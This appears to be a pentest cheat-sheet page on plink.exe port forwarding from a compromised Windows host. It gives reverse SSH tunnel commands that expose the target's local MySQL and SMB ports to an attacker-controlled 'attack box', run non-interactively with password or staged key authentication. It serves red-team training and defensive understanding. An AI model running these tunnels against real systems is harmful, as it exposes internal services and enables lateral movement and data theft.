Port Forwarding with PLINK

Download Plink

You can download the latest plink.exe binary from here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Individual Port Forwarding

Using plink.exe in SSH mode
A service on a compromised host is listening on 127.0.0.1
Open a port on attack box and forward traffic to remote port

Reverse Local Port to Remote Port

		Step 1. Estabish SSH Tunnel from Remote

[Attack Box] <<=========[SSH]========[+] [Remote]

127.0.0.1:[port]					127.0.0.1:[port]
		   [+]									 ^
        	|____________________________________|
        
    Step 2. Reverse Forward Attack Box Port to Remote

# Example Commands
# ----------------
# Open 127.0.0.1:33060 on Attack Box
# Tunnel to 127.0.0.1:3306 on target

# Password authentication
echo 'y' | .\plink.exe -ssh -l username -pw password -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip

# Private key authentication
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip

# Multiple port forwards
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 -R 127.0.0.1:4445:127.0.0.1:445 attack-box-ip

SSH Port Forwarding

Port Forwarding with Chisel

Port Forwarding with PLINK

Port Forwarding with PLINK

Download Plink

Individual Port Forwarding

Reverse Local Port to Remote Port